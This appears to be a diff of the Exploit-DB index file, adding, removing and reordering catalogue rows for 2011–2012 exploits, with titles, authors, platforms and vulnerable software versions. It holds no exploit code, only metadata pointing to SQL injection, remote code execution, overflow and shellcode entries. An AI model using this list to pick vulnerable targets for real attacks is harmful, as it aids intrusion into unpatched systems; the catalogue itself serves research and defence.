DoS",2011-11-11,swami,windows,dos,0 -18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 - Remote Command Execution",2011-11-13,metasploit,php,webapps,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow",2011-11-13,metasploit,windows,local,0 18110,platforms/php/webapps/18110.txt,"CMS 4.x.x Zorder (SQL Injection Vul)",2011-11-13,"KraL BeNiM",php,webapps,0 +18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 +18120,platforms/linux/dos/18120.py,"FleaHttpd Remote Denial of Service Exploit",2011-11-16,condis,linux,dos,80 18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin <= 2.2.3 (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 +18132,platforms/php/webapps/18132.php,"Support Incident Tracker <= 3.65 (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18112,platforms/windows/dos/18112.txt,"optima apiftp server <= 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,metasploit,windows,local,0 18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin <= 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 @@ -15699,8 +15737,6 @@ id,file,description,date,author,platform,type,port 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload Vulnerability",2011-11-15,PCA,php,webapps,0 -18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 -18120,platforms/linux/dos/18120.py,"FleaHttpd Remote Denial of Service Exploit",2011-11-16,condis,linux,dos,80 18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection Vulnerability",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,metasploit,windows,remote,0 @@ -15711,29 +15747,28 @@ id,file,description,date,author,platform,type,port 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp <= 1.6 - SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection Vulnerability",2011-11-19,TH3_N3RD,php,webapps,0 -18132,platforms/php/webapps/18132.php,"Support Incident Tracker <= 3.65 (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,metasploit,windows,remote,0 18137,platforms/win32/local/18137.rb,"QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0 18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0 18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,metasploit,windows,local,0 -18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 , DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 +18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0 -18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(""/bin/sh"", NULL, NULL) - 27 bytes",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 +18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(""/bin/sh""_ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18156,platforms/php/webapps/18156.txt,"php video script SQL Injection Vulnerability",2011-11-25,longrifle0x,php,webapps,0 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux/shellcode/18162.c,"Linux/MIPS - execve /bin/sh - 48 bytes",2011-11-27,rigan,linux,shellcode,0 18163,platforms/linux/shellcode/18163.c,"Linux/MIPS - add user(UID 0) with password - 164 bytes",2011-11-27,rigan,linux,shellcode,0 -18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 +19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 -18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0day)",2011-11-28,Alberto_Garca_Illera,php,webapps,0 +18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0day)",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 and 4300 Command Execution",2011-11-30,metasploit,hardware,remote,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability",2011-11-30,Silent_Dream,windows,dos,0 @@ -15748,29 +15783,29 @@ id,file,description,date,author,platform,type,port 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows",2011-12-01,"Nick Freeman",windows,local,0 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow",2011-12-01,"Nick Freeman",windows,local,0 -18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil nver",windows,remote,0 +18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service Vulnerability",2011-12-02,"SecPod Research",windows,dos,0 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal Vulnerability",2011-12-02,"SecPod Research",windows,remote,0 18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow",2011-12-02,metasploit,windows,remote,0 18192,platforms/php/webapps/18192.txt,"Joomla Jobprofile Component (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 and 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 +18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow (.m3u)",2011-12-03,metasploit,windows,local,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 18197,platforms/lin_x86-64/shellcode/18197.c,"linux/x86-64 execve(/bin/sh) 52 bytes",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 -18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 & 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 18199,platforms/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (DoS)",2011-12-05,rigan,hardware,dos,0 -18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 +18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 & 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' SQL-Injection Vulnerability",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,metasploit,php,webapps,0 -18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 -18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 -18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 -18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection, Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans <= 1.4.8 SQL/LFI Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection Vulnerability",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 (Joomla component) SQL injection",2011-12-08,Don,php,webapps,0 +18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 +18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 +18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 +18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 @@ -15789,24 +15824,23 @@ id,file,description,date,author,platform,type,port 18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-12-14,metasploit,php,webapps,0 -18245,platforms/multiple/remote/18245.py,"Splunk Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 18246,platforms/php/webapps/18246.txt,"Seotoaster SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection Vulnerability",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF <= 5.3 File Disclosure",2011-12-16,ZadYree,php,webapps,0 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 18250,platforms/php/webapps/18250.txt,"DotA OpenStats <= 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0 18251,platforms/php/webapps/18251.txt,"Joomla Component (com_dshop) SQL Injection Vulnerability",2011-12-19,CoBRa_21,php,webapps,0 +18257,platforms/windows/dos/18257.txt,"IrfanView TIFF Image Processing Buffer Overflow Vulnerability",2011-12-20,"Francis Provencher",windows,dos,0 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service Vulnerability",2011-12-19,JaMbA,windows,dos,0 18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn Double-Free Vulnerability",2011-12-20,"Francis Provencher",windows,dos,0 -18257,platforms/windows/dos/18257.txt,"IrfanView TIFF Image Processing Buffer Overflow Vulnerability",2011-12-20,"Francis Provencher",windows,dos,0 -18258,platforms/windows/local/18258.c,"TORCS 1.3.1 acc Buffer Overflow",2011-12-20,"Andrs Gmez",windows,local,0 +18258,platforms/windows/local/18258.c,"TORCS 1.3.1 acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0 18259,platforms/php/webapps/18259.txt,"Infoproject Business Hero Multiple Vulnerabilities",2011-12-21,LiquidWorm,php,webapps,0 18260,platforms/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps,0 18261,platforms/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps,0 18262,platforms/multiple/webapps/18262.txt,"Plone and Zope Remote Command Execution PoC",2011-12-21,"Nick Miles",multiple,webapps,0 +18268,platforms/windows/dos/18268.txt,"FreeSSHd Crash PoC",2011-12-24,Level,windows,dos,0 18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems <= 2.3.x - Multiple RCE Vulnerabilities",2011-12-23,mr_me,php,webapps,0 -18268,platforms/windows/dos/18268.txt,"FreeSSHd Crash PoC",2011-12-24,Level,windows,dos,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18270,platforms/windows/dos/18270.py,"Putty 0.60 Crash PoC",2011-12-24,Level,windows,dos,0 18271,platforms/windows/dos/18271.py,"Windows Media Player 11.0.5721.5262 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 @@ -15818,8 +15852,9 @@ id,file,description,date,author,platform,type,port 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid: Remote Root function pointer overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit metasploit",2011-12-27,"Fady Mohammed Osman",windows,remote,0 -18285,platforms/windows/dos/18285.py,"VLC 1.1.11 (libav) libavcodec_plugin.dll DoS",2011-12-28,"Mitchell Adair",windows,dos,0 +18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 +18285,platforms/windows/dos/18285.py,"VLC 1.1.11 (libav) libavcodec_plugin.dll DoS",2011-12-28,"Mitchell Adair",windows,dos,0 18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod SQL Injection Vulnerability",2011-12-29,snup,php,webapps,0 18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Stored XSS Vulnerability",2011-12-29,G13,php,webapps,0 18291,platforms/hardware/remote/18291.txt,"Reaver WiFi Protected Setup Exploit",2011-12-30,cheffner,hardware,remote,0 @@ -15831,13 +15866,23 @@ id,file,description,date,author,platform,type,port 18297,platforms/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection Vulnerabilitiy",2012-01-02,"H4ckCity Security Team",php,webapps,0 18298,platforms/php/webapps/18298.txt,"Php-X-Links Script SQL Injection Vulnerabilitiy",2012-01-02,"H4ckCity Security Team",php,webapps,0 18300,platforms/php/webapps/18300.txt,"MyPHPDating 1.0 - SQL Injection Vulnerability",2012-01-02,ITTIHACK,php,webapps,0 +18982,platforms/windows/webapps/18982.txt,"Hexamail Server <= 4.4.5 Persistent XSS Vulnerability",2012-06-04,modpr0be,windows,webapps,0 +19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0 18305,platforms/php/dos/18305.py,"PHP Hash Table Collision Proof Of Concept",2012-01-03,"Christian Mehlmauer",php,dos,0 18308,platforms/php/webapps/18308.txt,"Typo3 4.5-4.7 - Remote Code Execution (RFI/LFI)",2012-01-04,MaXe,php,webapps,0 18309,platforms/windows/dos/18309.pl,"VLC Media Player 1.1.11 - (.amr) Denial of Service PoC",2012-01-04,Fabi@habsec,windows,dos,0 18314,platforms/php/webapps/18314.txt,"Posse Softball Director CMS SQL Injection Vulnerabilitiy",2012-01-04,"H4ckCity Security Team",php,webapps,0 +18983,platforms/php/webapps/18983.php,"Mnews <= 1.1 (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 +18984,platforms/multiple/remote/18984.rb,"Apache Struts <= 2.2.1.1 - Remote Command Execution",2012-06-05,metasploit,multiple,remote,0 18318,platforms/windows/dos/18318.py,"Netcut 2.0 - Denial of Service Vulnerability",2012-01-04,MaYaSeVeN,windows,dos,0 +18977,platforms/php/dos/18977.php,"PHP 5.3.10 spl_autoload_register() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 +18978,platforms/php/dos/18978.php,"PHP 5.3.10 spl_autoload_call() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 +18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 +18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 Tagging Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18320,platforms/php/webapps/18320.txt,"Posse Softball Director CMS (team.php) Blind SQL Injection Vulnerability",2012-01-04,"Easy Laster",php,webapps,0 +19381,platforms/php/webapps/19381.php,"SugarCRM CE <= 6.3.1 - ""unserialize()"" PHP Code Execution",2012-06-23,EgiX,php,webapps,0 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0 +18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 18327,platforms/netware/dos/18327.txt,"Novell Netware XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 @@ -15865,22 +15910,24 @@ id,file,description,date,author,platform,type,port 18355,platforms/php/webapps/18355.txt,"Wordpress Count-per-day plugin Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload Vulnerability",2012-01-13,Dr.KroOoZ,php,webapps,0 +18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 +18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 +18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0 +18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0 +18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 +18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0 +18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability",2012-01-14,metasploit,windows,remote,0 18366,platforms/windows/local/18366.rb,"Adobe Reader U3D Memory Corruption Vulnerability",2012-01-14,metasploit,windows,local,0 18367,platforms/windows/remote/18367.rb,"XAMPP WebDAV PHP Upload",2012-01-14,metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,bsd,remote,0 -18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0 -18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0 -18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 -18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 -18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 -18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0 -18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,metasploit,windows,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2012-01-17,metasploit,osx,remote,0 18378,platforms/linux/dos/18378.c,"Linux IGMP Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 -18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 Search For php,html Writable Files and Add Your Code",2012-01-17,rigan,lin_x86,shellcode,0 +18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 Search For php/html Writable Files and Add Your Code",2012-01-17,rigan,lin_x86,shellcode,0 18380,platforms/php/webapps/18380.txt,"Joomla Discussions Component (com_discussions) SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 +18975,platforms/php/webapps/18975.rb,"Log1 CMS writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0 +18976,platforms/php/dos/18976.php,"PHP 5.3.10 spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0 18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection Vulnerability",2012-01-18,3spi0n,php,webapps,0 @@ -15890,23 +15937,27 @@ id,file,description,date,author,platform,type,port 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0 18390,platforms/php/webapps/18390.txt,"wordpress ucan post plugin <= 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 +18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18392,platforms/php/webapps/18392.php,"appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious Arbitrary Command Execution",2012-01-20,metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance Authentication Bypass Vulnerability",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage SQL Injection Vulnerability",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter <= 3.8.2 - Remote Pre-Auth Command Execute",2012-01-20,Abysssec,windows,remote,0 -18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow Exploit (Egghunter)",2012-01-21,red-dragon,windows,remote,0 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 18404,platforms/php/webapps/18404.pl,"iSupport 1.x - CSRF HTML Code Injection to Add Admin",2012-01-21,Or4nG.M4N,php,webapps,0 +18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0 18405,platforms/asp/webapps/18405.txt,"ARYADAD Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 +18411,platforms/linux/local/18411.c,"Linux Kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (#1)",2012-01-23,zx2c4,linux,local,0 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 -18411,platforms/linux/local/18411.c,"Linux Kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (#1)",2012-01-23,zx2c4,linux,local,0 -18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 +18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0 +18699,platforms/php/webapps/18699.txt,"PlumeCMS <= 1.2.4 - Multiple Persistent XSS",2012-04-04,"Ivano Binetti",php,webapps,0 +18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow",2012-04-04,metasploit,windows,remote,0 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0 +18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 